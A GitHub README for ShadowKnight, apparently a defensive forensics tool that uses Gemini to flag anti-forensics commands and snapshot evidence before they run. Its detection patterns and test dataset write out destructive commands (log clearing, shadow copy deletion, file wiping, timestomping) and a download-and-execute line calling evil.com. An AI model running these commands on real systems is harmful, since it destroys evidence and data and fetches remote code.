YaduvanshiHimanshunfsu/-ShadowKnight

GitHub: YaduvanshiHimanshunfsu/-ShadowKnight

一款企业级跨平台数字取证与应急响应平台，通过 AI 驱动的实时威胁检测在反取证命令执行前主动捕获并固化证据。

Stars: 0 | Forks: 0

# 🛡️ ShadowKnight v6.0 [![DOI](https://zenodo.org/badge/1152719327.svg)](https://doi.org/10.5281/zenodo.18524153) ![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg) ![Python](https://img.shields.io/badge/Python-3.x-blue.svg) **Project Classification:** Enterprise-Grade Digital Forensics & Incident Response Platform **Architecture:** Hybrid Event-Driven + AI-Powered Detection System **Target Environment:** Windows, Linux, and macOS (Official v4.0 Universal Support) **Scale:** Production-Ready, High-Volume Attack Detection **Forensic Integrity:** Tamper-Evident Evidence Collection ## 📋 Table of Contents 1. [Executive Summary](#executive-summary) 2. [System Architecture](#system-architecture) 3. [Technology Stack](#technology-stack) 4. [Core Components Deep Dive](#core-components-deep-dive) 5. [Detection Pipeline](#detection-pipeline) 6. [AI Intelligence Layer](#ai-intelligence-layer) 7. [Evidence Preservation System](#evidence-preservation-system) 8. [Performance & Scalability](#performance--scalability) 9. [Security Architecture](#security-architecture) 10. [Integration Capabilities](#integration-capabilities) 11. [Deployment Guide](#deployment-guide) 12. [Testing & Validation](#testing--validation) 13. [Known Limitations & Future Roadmap](#known-limitations--future-roadmap) ## 🎯 Executive Summary ### Project Purpose ShadowKnight v4.0 is an advanced cyber forensics platform designed to detect, analyze, and preserve evidence of anti-forensics activities in real-time. The system combines kernel-level process monitoring with Google's Gemini AI to provide intelligent threat detection with <1ms latency. ### Key Innovation **Proactive Evidence Preservation**: Unlike traditional forensic tools that analyze artifacts post-incident, ShadowKnight captures evidence *before* anti-forensics commands can destroy it, ensuring critical data is preserved for investigation. ### Problem Statement Addressed 1. **Log Tampering**: Attackers routinely clear event logs using `wevtutil`, `Clear-EventLog`, etc. 2. **Shadow Copy Deletion**: Ransomware operators delete Volume Shadow Copies to prevent recovery 3. **Secure File Deletion**: Tools like `cipher /w`, `sdelete` make file recovery impossible 4. **Obfuscated Commands**: Base64-encoded PowerShell and other obfuscation techniques evade detection ### Solution Architecture - **Real-Time Detection**: Hybrid monitoring (WMI Events on Windows, Optimized Polling on Unix) - **AI-Powered Analysis**: Gemini 2.5 Flash for command deobfuscation and threat classification - **Emergency Snapshots**: <100ms evidence capture before command execution - **Behavioral Analysis**: Keystroke timing analysis to detect automated/bot activity - **Fully Universal**: Native protection for Windows (.evtx), Linux (syslog/auditd), and macOS (Unified Log) ## 🏗️ System Architecture ### High-Level Architecture Diagram ![System Architecture](https://static.pigsec.cn/wp-content/uploads/repos/cas/0b/0b7ce5e8fa3442a2e5df6d22701317779eba2114207c19766ea21a4d618272d4.png) ### Component Interaction Flow **1. Detection Phase (0-1ms)** Process Created → WMI Event → Keyword Match → Queue for Analysis **2. Analysis Phase (100-500ms)** Command → Decoder → Gemini AI → Threat Classification → Decision **3. Preservation Phase (<100ms, parallel)** THREAT Detected → Emergency Snapshot Trigger → Multi-threaded Collection **4. Reporting Phase (Async, non-blocking)** Evidence → JSON Metadata → Forensic Report → SIEM/Alerts ## 🔧 Technology Stack ### Core Runtime - **Language**: Python 3.10+ - **Concurrency**: Threading + Queue (async processing) - **Platform**: Cross-platform with OS auto-detection ### Critical Dependencies #### System Monitoring & Instrumentation wmi>=1.5.1 # Windows Management Instrumentation (event-driven) psutil>=5.9.0 # Cross-platform process monitoring pywin32>=306 # Windows API access (admin elevation detection) #### AI & Intelligence google-generativeai>=0.3.0 # Gemini API client #### Configuration & Security python-dotenv>=1.0.0 # Environment variable management pyyaml>=6.0 # YAML configuration parsing pydantic>=2.0.0 # Data validation & security #### Data Processing pillow>=10.0.0 # Image processing for artifacts requests>=2.31.0 # HTTP client for API integrations #### Optional Integrations flask>=3.0.0 # REST API server (dashboard) flask-cors>=4.0.0 # CORS support for web UI colorama>=0.4.6 # Terminal color formatting rich>=13.0.0 # Enhanced terminal output ### External Dependencies - **Windows**: WMI service, PowerShell 5.1+ - **Linux**: systemd-journald, auditd (optional) - **macOS**: Unified Logging System ## 🔍 Core Components Deep Dive ### 1. Cross-Platform Process Monitor (`core/process_monitor.py`) **Purpose**: High-speed process creation detection across all operating systems. **Technical Implementation**: class ProcessMonitor: """ UNIVERSAL ARCHITECTURE: 1. Windows: Hybrid WMI Events (0ms) + Fast Polling (10ms) 2. Linux: Optimized psutil Polling (10ms) + /proc monitoring 3. macOS: Optimized Darwin-Kernel Polling """ def start_monitoring(self): if self.os_type == 'windows': self.start_wmi_monitor() # Instant Event-driven else: self.start_unix_monitor() # High-frequency polling # Subscribe to process creation events self.process_watcher = self.wmi_connection.Win32_Process.watch_for("creation") while self.monitoring: # BLOCKING call - no CPU usage until event occurs new_process = self.process_watcher(timeout_ms=1000) if new_process: self._process_event(new_process) **Key Features**: - **Event-Driven**: No polling overhead, CPU usage near 0% when idle - **Hybrid Approach**: Combines WMI events + fast polling for reliability - **Deduplication**: LRU cache prevents duplicate alerts (30s window) - **Process Metadata**: Captures PID, parent PID, command line, username, timestamp **Performance Characteristics**: - Detection Latency: <1ms (event-driven) - CPU Usage: <0.5% (idle), <2% (under attack) - Memory: ~50MB baseline - Throughput: 10,000+ processes/second **Limitations**: - Requires Windows platform - Can be bypassed by direct kernel shellcode injection (Ring 0) - WMI service must be running - Some very fast processes may be caught only by polling backup ### 2. Behavioral Guard (`core/behavior_monitor.py`) **Purpose**: Detects non-process based anomalies (Keyloggers, Bot inputs). **Technical Implementation**: - **Jitter Analysis**: Calculates Standard Deviation of keystroke timings. - **Thresholds**: - `< 10ms variance`: Flagged as MECHANICAL/BOT - `> 50ms variance`: Classified as HUMAN - **AI Verification**: Sends suspicious patterns to Gemini for 2nd opinion. ### 3. Gemini Command Analyzer (`core/gemini_command_analyzer.py`) **Purpose**: AI-powered command analysis for threat detection and classification **Technical Implementation**: class GeminiCommandAnalyzer: def analyze_command(self, command_line: str, process_info: dict): # 1. Decode obfuscated commands decoded_command, obfuscation_techniques = CommandDecoder.decode_if_encoded(command_line) # 2. Build enhanced prompt with context prompt = f""" COMMAND: {decoded_command} PROCESS: {process_info['name']} (PID: {process_info['pid']}) USER: {process_info.get('user')} PARENT: {process_info.get('parent_name')} (PID: {process_info.get('parent_pid')}) Analyze for anti-forensics indicators... """ # 3. Call Gemini API response = self.model.generate_content(prompt) # 4. Parse JSON response result = json.loads(response.text) return result **AI Response Schema**: { "is_anti_forensics": true, "confidence": 0.95, "category": "log_clearing", "severity": "CRITICAL", "explanation": "Command clears Security event log...", "threat_indicators": ["wevtutil", "cl", "Security"], "recommended_action": "immediate_isolation", "likely_threat_actor": "APT28 (Fancy Bear)", "mitre_attack_ttps": ["T1070.001"], "context_notes": "Executed with elevated privileges..." } **Advanced Features**: - **Deobfuscation**: Automatically decodes Base64, Hex, Binary commands - **Context-Aware**: Considers user, parent process, elevation status - **MITRE Mapping**: Maps commands to ATT&CK framework TTPs - **Batch Processing**: Supports multi-command analysis (cost optimization) - **Error Handling**: Graceful fallback on API failures **Performance**: - API Latency: 200-500ms (Gemini 2.5 Flash) - Rate Limit: 20 calls/minute (configurable, respects free tier) - Cache: 10s TTL for duplicate commands - Accuracy: ~95% true positive rate (based on test dataset) ### 4. Emergency Snapshot Engine (`core/emergency_snapshot.py`) **Purpose**: Ultra-fast evidence capture (<100ms) before anti-forensics execution **Technical Implementation**: **Parallel Thread Architecture**: def emergency_snapshot(self, threat_type: str, command: str, process_info: dict): threads = [] # Spawn parallel threads for different evidence types if threat_type == 'log_clearing': threads.append(Thread(target=self._snapshot_event_logs)) if threat_type == 'vss_deletion': threads.append(Thread(target=self._snapshot_vss_state)) # Always capture these (universal threat indicators) threads.append(Thread(target=self._snapshot_process_state)) threads.append(Thread(target=self._snapshot_network_state)) # Start all (parallel execution) for thread in threads: thread.start() # Wait for completion for thread in threads: thread.join() **Evidence Types Captured**: | Evidence Type | Windows | Linux | macOS | Admin Required? | |---------------|---------|-------|-------|-----------------| | Event Logs | ✅ (.evtx) | ✅ (syslog) | ✅ (unified log) | Yes (full), Partial (metadata) | | Process State | ✅ | ✅ | ✅ | No | | Network Connections | ✅ | ✅ | ✅ | No | | VSS State | ✅ | ❌ | ❌ | Yes | | File Metadata | ✅ | ✅ | ✅ | Partial | **Windows Event Log Capture**: # Full export (requires admin) wevtutil epl Security C:\evidence\Security.evtx # Metadata fallback (no admin required) wevtutil gli Security # Log info wevtutil qe Security /c:10 # Recent 10 events **Performance Benchmarks**: - Event Logs (3 logs): 40-60ms - Process State: 10-15ms - Network State: 5-10ms - VSS State: 15-20ms - **Total (parallel)**: 60-100ms **Forensic Integrity**: - All files are SHA-256 hashed - Timestamps preserved (creation, modification, access) - Chain of evidence trail JSON metadata - Read-only mode after capture - Original file permissions preserved ### 5. Behavioral Analyzer (`core/gemini_behavior_analyzer.py`) **Purpose**: Detect automated/bot activity and user behavior anomalies **Keystroke Timing Analysis**: def analyze_keystroke_pattern(self, keystroke_timings: List[int]): """ Human vs Bot Detection Human Characteristics: - Variable timing (100-250ms with variance) - Natural rhythm, occasional pauses - Errors and corrections Bot Characteristics: - Consistent timing (<10ms variance) - Perfect regularity - No pauses """ **Statistical Analysis**: - **Standard Deviation**: Human > 50ms, Bot < 10ms - **Mean Interval**: Human 150-200ms, Bot < 50ms - **Coefficient of Variation**: Human > 0.3, Bot < 0.1 ### 6. Evidence Vault & Chain of Evidence Trail (`utils/evidence_vault.py`) **Purpose**: Secure preservation and legal admissibility assurance. **Key Features**: * **Cryptographic Hashing**: Every report and artifact is SHA-256 hashed immediately upon creation. * **Tamper-Evident Logs**: All actions are recorded in `evidence/chain_of_evidence_trail.json`. * **Automated Packaging**: Raw evidence snapshots are automatically zipped and stored in `evidence/artifacts`. **Chain of Evidence Trail Record Format**: { "evidence_id": "REP-20260208-233225", "incident_id": "INC-20260208-233225", "evidence_type": "forensic", "timestamp": "2026-02-08T23:32:25.265121", "file_path": "evidence\\reports\\INC-20260208-233225_forensic.md", "hash_sha256": "8f4b...", "collected_by": "ShadowKnight", "action": "report_generated" } **Artifact Preservation Workflow**: 1. **Capture**: Emergency Snapshot triggered (Ram/Logs/Network). 2. **Package**: Folder zipped to `RAW_EVIDENCE_SNAPSHOT.zip`. 3. **Hash**: SHA-256 calculated for the zip archive. 4. **Vault**: Zip moved to `evidence/artifacts//`. 5. **Log**: Entry added to Chain of Evidence Trail. **User Activity Baseline**: def build_user_baseline(self, user_id: str, historical_activities: List[dict]): """ AI learns normal user behavior: - Typical working hours - Common applications - File access patterns - Administrative activity frequency """ **Attack Sequence Detection**: def analyze_command_sequence(self, command_sequence: List[str]): """ Detects multi-stage attacks: 1. Reconnaissance (whoami, ipconfig) 2. Privilege Escalation 3. Credential Dumping 4. Lateral Movement 5. Anti-Forensics """ **MITRE ATT&CK Kill Chain Mapping**: - Initial Access → Execution → Persistence → Privilege Escalation → Defense Evasion → Credential Access → Discovery → Lateral Movement → Collection → Exfiltration → Impact ### 7. Proactive Evidence Collector (`core/proactive_evidence_collector.py`) **Purpose**: Capture evidence BEFORE anti-forensics commands can destroy it **Threat Pattern Database**: threat_patterns = { 'wevtutil': { 'threat_type': 'log_clearing', 'severity': 'CRITICAL', 'description': 'Windows Event Log manipulation' }, 'vssadmin delete': { 'threat_type': 'vss_deletion', 'severity': 'CRITICAL', 'description': 'Volume Shadow Copy deletion' }, 'cipher /w': { 'threat_type': 'file_wiping', 'severity': 'HIGH', 'description': 'Secure file deletion' } } **Intelligent Triggering**: def should_capture(self, command: str) -> Optional[dict]: # 1. Decode if obfuscated decoded_command = CommandDecoder.decode_if_encoded(command) # 2. Check against threat patterns for pattern, threat_info in threat_patterns.items(): if pattern in decoded_command.lower(): # 3. Upgrade severity if obfuscated if obfuscation_detected: threat_info['severity'] = upgrade_severity(threat_info['severity']) return threat_info return None **Cross-Platform Support**: - **Windows**: Event logs, VSS, Registry, Prefetch - **Linux**: syslog, auditd, journal, bash history - **macOS**: unified log, FSEvents, Spotlight metadata ## 🎯 Detection Pipeline ### Phase 1: Process Creation Detection (0-1ms Windows, 10ms Unix) ┌───────────────────────────────────────────────────┐ │ OS KERNEL EVENT / HIGH-SPEED POLLING │ │ • Windows: WMI __InstanceCreationEvent │ │ • Linux: procfs /proc entry monitoring │ │ • macOS: sysctl process tree diff │ │ │ │ Captured Metadata: │ │ • ProcessId (PID) & Parent PID │ │ • CommandLine & Executable Path │ │ • User Context (Owner/UID/GID) │ │ • Platform-Specific Metadata │ └───────────────────┬───────────────────────────────┘ │ ▼ ┌───────────────────────────────────────────────────┐ │ Universal Filter & Deduplication │ │ • Check against OS-specific patterns │ │ • LRU cache check (30s window) │ │ • Force-match critical forensic tools │ └───────────────────┬───────────────────────────────┘ │ ▼ MATCH FOUND │ ▼ ┌───────────────────────────────────────────────────┐ │ Enrich Context │ │ • Get parent process details │ │ • Check elevation status │ │ • Capture current working directory │ │ • Get user session info │ └───────────────────────────────────────────────────┘ ### Phase 2: AI Analysis (100-500ms) ┌───────────────────────────────────────────────────┐ │ Command Decoder │ │ • Base64 decode (-EncodedCommand) │ │ • Hex decode (\x notation) │ │ • Binary detection (MZ header) │ │ • URL decode │ └───────────────────┬───────────────────────────────┘ │ ▼ ┌───────────────────────────────────────────────────┐ │ Gemini AI Analysis │ │ │ │ Input: │ │ • Decoded command │ │ • Process context │ │ • User information │ │ • Parent process chain │ │ • Historical activity (if available) │ │ │ │ Output: │ │ • Threat classification │ │ • Confidence score (0.0-1.0) │ │ • MITRE ATT&CK TTPs │ │ • Threat actor attribution (if applicable) │ │ • Recommended response action │ └───────────────────┬───────────────────────────────┘ │ ▼ AI Verdict │ ┌───────────┴───────────┐ │ │ ▼ ▼ THREAT BENIGN │ │ ▼ ▼ Phase 3: Preservation Log & Monitor ### Phase 3: Evidence Preservation (<100ms) ┌───────────────────────────────────────────────────┐ │ Emergency Snapshot Trigger │ │ Threat Type: [log_clearing|vss_deletion|...] │ └───────────────────┬───────────────────────────────┘ │ ▼ ┌───────────────────────────────────────────────────┐ │ Parallel Thread Spawn │ │ │ │ Thread 1: Event Logs │ │ ├─ Security.evtx │ │ ├─ System.evtx │ │ └─ Application.evtx │ │ │ │ Thread 2: Process State │ │ ├─ All running processes (PID, name, cmdline) │ │ ├─ Process tree (parent-child relationships) │ │ └─ Loaded modules per process │ │ │ │ Thread 3: Network State │ │ ├─ Active TCP connections │ │ ├─ UDP listeners │ │ └─ Process-to-connection mapping │ │ │ │ Thread 4: VSS State (Windows) │ │ ├─ Shadow copy list │ │ ├─ Volume information │ │ └─ Shadow copy metadata │ │ │ │ Thread 5: File Metadata │ │ ├─ Recent file access timestamps │ │ ├─ Directory listings │ │ └─ File hashes (critical files) │ └───────────────────┬───────────────────────────────┘ │ ▼ ┌───────────────────────────────────────────────────┐ │ Evidence Vault Storage │ │ Path: evidence/emergency_snapshots/SNAP-XXXXXX │ │ │ │ Forensic Integrity: │ │ • SHA-256 hash per file │ │ • Immutable storage (read-only) │ │ • Chain of evidence trail JSON │ │ • Original timestamps preserved │ └───────────────────────────────────────────────────┘ ### Phase 4: Reporting & Alerting (Async) ┌───────────────────────────────────────────────────┐ │ Incident Report Generator │ │ │ │ Output Formats: │ │ • Forensic Markdown Report │ │ • JSON Metadata │ │ • Evidence Index (file listing) │ │ • CEF Format (SIEM integration) │ └───────────────────┬───────────────────────────────┘ │ ▼ ┌───────────────────────────────────────────────────┐ │ Multi-Channel Alerting │ │ │ │ • Console (immediate) │ │ • Slack (webhook) │ │ • Email (SMTP) │ │ • Discord (webhook) │ │ • PagerDuty (API) │ └───────────────────┬───────────────────────────────┘ │ ▼ ┌───────────────────────────────────────────────────┐ │ SIEM Integration │ │ │ │ Supported Platforms: │ │ • Splunk (HEC) │ │ • IBM QRadar (API) │ │ • Elastic Stack (REST) │ │ • Syslog (UDP/TCP) │ │ │ │ Event Format: CEF (Common Event Format) │ └───────────────────────────────────────────────────┘ ## 🤖 AI Intelligence Layer ### Gemini 2.5 Flash Model Selection Rationale **Why Gemini 2.5 Flash?** 1. **Low Latency**: 200-500ms response time (vs 1-2s for Pro) 2. **High Throughput**: 60 requests/minute (free tier) 3. **Context Window**: 1M tokens (sufficient for command analysis) 4. **Multimodal**: Supports text + image analysis (future: screenshot analysis) 5. **Cost**: Free tier adequate for POC/small deployments **Model Comparison**: | Model | Latency | Context | Throughput | Best For | |-------|---------|---------|------------|----------| | Gemini 2.5 Flash | 200-500ms | 1M tokens | 60/min | Real-time detection | | Gemini 1.5 Pro | 1-2s | 2M tokens | 15/min | Deep analysis | | Gemini 1.5 Flash | 300-800ms | 1M tokens | 60/min | Legacy fallback | ### Prompt Engineering Strategy **Enhanced Prompt Structure**: prompt = f""" [ROLE] You are a cybersecurity expert analyzing commands for anti-forensics activity. [CONTEXT] System: {os_info} User: {user_info} Privilege: {elevation_status} [COMMAND] Original: {original_command} Decoded: {decoded_command} Obfuscation: {obfuscation_techniques} [PROCESS TREE] Current: {process_name} (PID: {pid}) Parent: {parent_name} (PPID: {ppid}) Ancestors: {ancestor_chain} [TASK] Classify as anti-forensics or benign. Consider context and intent, not just keywords. [OUTPUT FORMAT] JSON with keys: is_anti_forensics, confidence, category, severity, explanation, mitre_attack_ttps """ **Few-Shot Learning Examples** (in prompt): EXAMPLE 1 (Anti-Forensics): Command: wevtutil cl Security Classification: CRITICAL - Clearing security event log MITRE: T1070.001 EXAMPLE 2 (Benign): Command: wevtutil qe Application /c:10 Classification: BENIGN - Querying application log (read-only) EXAMPLE 3 (Obfuscated Anti-Forensics): Command: powershell -enc Q2xlYXItRXZlbnRMb2c= Decoded: Clear-EventLog Classification: CRITICAL - Obfuscated log clearing MITRE: T1070.001, T1027 (Obfuscated Files or Information) ### AI Safety & Validation **Response Validation**: def validate_ai_response(response: dict) -> bool: required_keys = ['is_anti_forensics', 'confidence', 'category', 'severity'] # 1. Check schema if not all(key in response for key in required_keys): return False # 2. Check value ranges if not 0.0 <= response['confidence'] <= 1.0: return False # 3. Check enum values if response['severity'] not in ['LOW', 'MEDIUM', 'HIGH', 'CRITICAL']: return False return True **Fallback Strategy**: # If AI fails, use keyword-based heuristics if ai_response.get('error'): return { 'is_anti_forensics': True if keyword_match else False, 'confidence': 0.5, 'category': 'keyword_match', 'severity': 'MEDIUM', 'explanation': f'AI unavailable, keyword match: {matched_keywords}', 'fallback': True } ## 💾 Evidence Preservation System ### Chain of Evidence Trail Implementation **Metadata Schema**: { "incident_id": "INC-20260208-213742", "snapshot_id": "SNAP-20260208-213742", "evidence_items": [ { "file_path": "evidence/emergency_snapshots/SNAP-20260208-213742/event_logs/Security.evtx", "sha256": "a1b2c3d4e5f6...", "file_size": 20971520, "captured_at": "2026-02-08T21:37:42.123456Z", "captured_by": "ShadowKnight v4.0", "source_location": "C:\\Windows\\System32\\winevt\\Logs\\Security.evtx", "original_timestamps": { "created": "2026-02-01T08:00:00Z", "modified": "2026-02-08T21:37:41Z", "accessed": "2026-02-08T21:37:42Z" }, "evidence_type": "event_log", "integrity_verified": true } ], "threat_context": { "command": "wevtutil cl Security", "process": "cmd.exe", "pid": 12345, "user": "DOMAIN\\attacker", "parent_process": "explorer.exe", "threat_category": "log_clearing", "severity": "CRITICAL" }, "system_state": { "hostname": "WORKSTATION01", "os": "Windows 10 Pro", "ip_address": "192.168.1.100", "running_processes": 156, "network_connections": 42 } } ### Evidence Storage Structure evidence/ ├── artifacts/ # Isolated suspicious files ├── emergency_snapshots/ # Real-time captures │ ├── SNAP-20260208-213742/ │ │ ├── event_logs/ │ │ │ ├── Security.evtx │ │ │ ├── System.evtx │ │ │ └── Application.evtx │ │ ├── process_state.json │ │ ├── network_state.json │ │ └── vss_state.txt │ └── SNAP-20260208-213743/ ├── incidents/ # Per-incident folders │ ├── INC-20260208-213742/ │ │ ├── incident.json # Metadata │ │ ├── INCIDENT_REPORT.md # Human-readable │ │ └── EVIDENCE_INDEX.txt # File listing ├── logs/ # System logs │ └── shadow_knight.log ├── reports/ # Forensic reports │ └── INC-20260208-213742_forensic_20260208-213742.md └── chain_of_evidence_trail.json # Master ledger ### Forensic Integrity Guarantees **Immutability**: - Files set to read-only after capture - Write protection at OS level (Windows: `attrib +r`, Linux: `chmod 444`) - Optional EFS/BitLocker integration for vault directory **Hashing**: - SHA-256 for all files (cryptographic integrity) - Hash verification before and after storage - Hash chain in chain_of_evidence_trail.json **Timestamps**: - Original file timestamps preserved (MAC times) - Capture timestamps in ISO 8601 format (UTC) - Nanosecond precision where available **Access Logging**: - All evidence vault access logged - Audit trail includes: timestamp, user, action, file accessed - WORM (Write Once, Read Many) compliance for legal admissibility ## ⚡ Performance & Scalability ### Benchmarks (Windows 10, Intel i7, 16GB RAM) **Detection Performance**: | Metric | WMI (Primary) | Polling (Backup) | |--------|---------------|------------------| | Detection Latency | <1ms | 10ms | | CPU Usage (Idle) | <0.5% | <1% | | CPU Usage (Load) | <2% | <5% | | Memory Usage | 50MB | 30MB | | Throughput | 10,000+ processes/s | 100 processes/s | **AI Analysis Performance**: | Operation | Gemini 2.5 Flash | Gemini 1.5 Pro | |-----------|------------------|----------------| | Single Command | 200-500ms | 1-2s | | Batch (10 commands) | 300-800ms | 2-5s | | Rate Limit (Free Tier) | 60/min | 15/min | | Context Window | 1M tokens | 2M tokens | **Evidence Capture Performance**: | Evidence Type | Capture Time | Size (Typical) | |---------------|--------------|----------------| | Event Logs (3 logs) | 40-60ms | 20-100MB | | Process State | 10-15ms | 1-5MB | | Network State | 5-10ms | 100KB-1MB | | VSS State | 15-20ms | 10KB-100KB | | **Total (Parallel)** | **60-100ms** | **25-110MB** | ### Scalability Considerations **Vertical Scaling** (Single Machine): - Multi-core CPU: Up to 8 worker threads (configurable) - RAM: 4GB minimum, 16GB recommended - Disk: SSD recommended for evidence vault (I/O intensive) **Horizontal Scaling** (Distributed): - Deploy multiple agents across network - Central SIEM aggregation (Splunk, QRadar, Elastic) - Shared evidence vault (NAS, S3-compatible storage) **Rate Limiting & Optimization**: rate_limiting: max_api_calls_per_minute: 20 # Stay under free tier (60/min) cache_results: true # Reduce duplicate API calls cache_ttl_seconds: 10 # Cache lifetime batch_non_urgent: true # Batch low-priority commands **Deduplication**: - LRU cache for recent commands (30s window) - Prevents alert fatigue from loops/scripts - Key: `{process_name}:{command_hash}` ## 🔒 Security Architecture ### Threat Model **Adversary Goals**: 1. **Evade Detection**: Use obfuscation, renamed binaries 2. **Disable Monitoring**: Kill ShadowKnight process, stop WMI service 3. **Tamper with Evidence**: Modify/delete evidence vault 4. **Escalate Privileges**: Bypass admin detection **Defenses**: | Attack Vector | Defense Mechanism | |---------------|-------------------| | Process Termination | Run as Windows Service (auto-restart) | | WMI Service Stop | Hybrid polling backup | | Evidence Tampering | Read-only files, SHA-256 verification | | Privilege Escalation | Elevation detection, user activity profiling | | Obfuscation | Multi-layer decoding (Base64, Hex, Binary) | | Renamed Binaries | Process path analysis, Gemini AI classification | ### API Key Security **.env Security**: # .env file (NEVER commit to git) GEMINI_API_KEY=AIzaSyC... # .gitignore .env *.env *.key **Key Rotation**: - Monthly rotation recommended - Automated via secret management (AWS Secrets Manager, Azure Key Vault) - Zero-downtime rotation with dual-key support **Rate Limiting Protection**: - Client-side rate limiting (20 calls/min default) - Exponential backoff on API errors - Fallback to keyword-based detection if API unavailable ### Data Privacy & GDPR Compliance **Sensitive Data Handling**: - **Usernames**: Hashed in reports (optional) - **IP Addresses**: Anonymized (last octet masked) - **Command History**: Configurable retention (default 90 days) - **Encryption**: AES-256 for evidence vault (optional) **Audit Logging**: - All evidence access logged - User actions timestamped - Immutable audit trail (append-only) ## 🔌 Integration Capabilities ### SIEM Integration (CEF Format) **Common Event Format (CEF) Output**: CEF:0|ShadowKnight|ShadowKnight|4.0|100|Anti-Forensics Detected|10| cs1=INC-20260208-213742 cs1Label=IncidentID cs2=log_clearing cs2Label=ThreatCategory cs3=wevtutil cl Security cs3Label=Command cs4=cmd.exe cs4Label=ProcessName cn1=12345 cn1Label=ProcessID suser=DOMAIN\attacker src=192.168.1.100 shost=WORKSTATION01 outcome=CRITICAL msg=Security event log clearing detected **Supported Platforms**: | Platform | Protocol | Authentication | Format | |----------|----------|----------------|--------| | Splunk | HEC (HTTPS) | HEC Token | JSON | | IBM QRadar | REST API | API Token | JSON | | Elastic Stack | REST API | API Key | JSON | | Syslog | UDP/TCP | None | CEF | **Configuration Example**: # config/config.yaml siem_integration: splunk: hec_url: https://splunk.company.com:8088/services/collector hec_token: ${SPLUNK_HEC_TOKEN} verify_ssl: true qradar: api_url: https://qradar.company.com api_token: ${QRADAR_API_TOKEN} syslog: server: 192.168.1.50 port: 514 protocol: udp ### Alert Manager Channels **Multi-Channel Alerting**: alert_mgr.send_alert( title="[CRITICAL] Anti-Forensics Detected", message="wevtutil cl Security executed by DOMAIN\\attacker", severity=AlertSeverity.CRITICAL, channels=[ AlertChannel.CONSOLE, AlertChannel.SLACK, AlertChannel.EMAIL ], metadata={ 'incident_id': 'INC-20260208-213742', 'mitre_ttps': ['T1070.001'] } ) **Slack Integration**: # .env SLACK_WEBHOOK_URL=https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXX # Sends rich message with buttons { "text": "🚨 CRITICAL Alert", "attachments": [{ "color": "danger", "title": "Anti-Forensics Detected", "fields": [ {"title": "Command", "value": "wevtutil cl Security"}, {"title": "User", "value": "DOMAIN\\attacker"}, {"title": "Incident", "value": "INC-20260208-213742"} ], "actions": [ {"type": "button", "text": "View Report", "url": "..."} ] }] } ## 🚀 Deployment Guide ### Prerequisites **System Requirements**: - **OS**: Windows 10/11, Server 2016+, Linux (Ubuntu/CentOS/Debian), macOS 12+ - **CPU**: 2+ cores, Intel i5/Ryzen 5 or better - **RAM**: 4GB minimum, 8GB recommended - **Disk**: 10GB minimum (evidence vault grows over time) - **Network**: Internet access for Gemini API **Software Requirements**: - **Python**: 3.10+ - **Windows**: WMI service enabled, PowerShell 5.1+ - **Privileges**: Administrator (for full event log access) ### Installation Steps **1. Clone Repository**: git clone https://github.com/YaduvanshiHimanshunfsu/ShadowKnight.git cd ShadowKnight **2. Create Virtual Environment**: python -m venv venv # Windows venv\Scripts\activate # Linux/macOS source venv/bin/activate **3. Install Dependencies**: pip install -r requirements.txt # Windows-specific (WMI support) pip install pywin32 wmi **4. Configure Environment**: # Copy example config cp .env.example .env # Edit .env nano .env # Add your Gemini API key GEMINI_API_KEY=AIzaSyC... **5. Test Installation**: python shadow_knight_realtime.py ### Configuration Files **config/config.yaml**: shadow_knight: # Model selection models: fast: gemini-2.5-flash intelligent: gemini-2.5-flash # Evidence retention evidence_vault: path: ./evidence retention_days: 90 encryption: true # Suspicious keywords (customize for your environment) monitoring: suspicious_keywords: - wevtutil - vssadmin - cipher # Add more... ### Running as Windows Service **Create Service** (requires admin): # Install NSSM (Non-Sucking Service Manager) choco install nssm # Create service nssm install ShadowKnight "C:\path\to\venv\Scripts\python.exe" "C:\path\to\shadow_knight_realtime.py" # Set service to auto-start nssm set ShadowKnight Start SERVICE_AUTO_START # Start service nssm start ShadowKnight **Service Management**: # Check status nssm status ShadowKnight # Stop service nssm stop ShadowKnight # Restart service nssm restart ShadowKnight # View logs Get-Content C:\path\to\evidence\logs\shadow_knight.log -Tail 50 -Wait ### Docker Deployment (Linux) **Dockerfile**: FROM python:3.11-slim WORKDIR /app COPY requirements.txt . RUN pip install --no-cache-dir -r requirements.txt COPY . . # Create evidence vault RUN mkdir -p /app/evidence # Run as non-root (security) RUN useradd -m shadow_knight USER shadow_knight CMD ["python", "shadow_knight_realtime.py"] **docker-compose.yml**: version: '3.8' services: shadow_knight: build: . container_name: shadow_knight-nexus restart: unless-stopped environment: - GEMINI_API_KEY=${GEMINI_API_KEY} volumes: - ./evidence:/app/evidence - ./config:/app/config network_mode: host # Required for WMI access ## 🧪 Testing & Validation ### Test Dataset **Benign Commands** (Should NOT trigger): # System administration Get-Process Get-Service ipconfig /all netstat -ano tasklist # Log querying (read-only) wevtutil qe Security /c:10 Get-EventLog -LogName Security -Newest 10 **Anti-Forensics Commands** (Should trigger CRITICAL): # Log clearing wevtutil cl Security Clear-EventLog -LogName Security Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx # Shadow copy deletion vssadmin delete shadows /all /quiet wmic shadowcopy delete # Secure file deletion cipher /w:C:\temp sdelete -s C:\temp\sensitive.doc # Timestomping powershell (Get-Item file.txt).LastWriteTime = "01/01/2000" **Obfuscated Commands** (Should trigger HIGH/CRITICAL): # Base64-encoded log clearing powershell -EncodedCommand Q2xlYXItRXZlbnRMb2c= # Hex-encoded PowerShell powershell -Command "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Q2xlYXItRXZlbnRMb2c=')); Invoke-Expression $cmd" # Download and execute (common malware pattern) powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')" ### Automated Test Suite **test_behavioral_ai.py**: def test_human_vs_bot_detection(): """Test keystroke timing analysis""" # Human typing pattern (variable timing) human_timings = [120, 180, 95, 210, 150, 170, 130, 190] result = behavior_analyzer.analyze_keystroke_pattern(human_timings) assert result['is_human'] == True assert result['confidence'] > 0.7 # Bot typing pattern (consistent timing) bot_timings = [5, 5, 5, 5, 5, 5, 5, 5] result = behavior_analyzer.analyze_keystroke_pattern(bot_timings) assert result['is_human'] == False assert result['confidence'] > 0.9 **test_local_keylogger.py**: def test_command_detection(): """Test command detection pipeline""" # Test anti-forensics command command = "wevtutil cl Security" process_info = {'name': 'cmd.exe', 'pid': 12345} result = ai_analyzer.analyze_command(command, process_info) assert result['is_anti_forensics'] 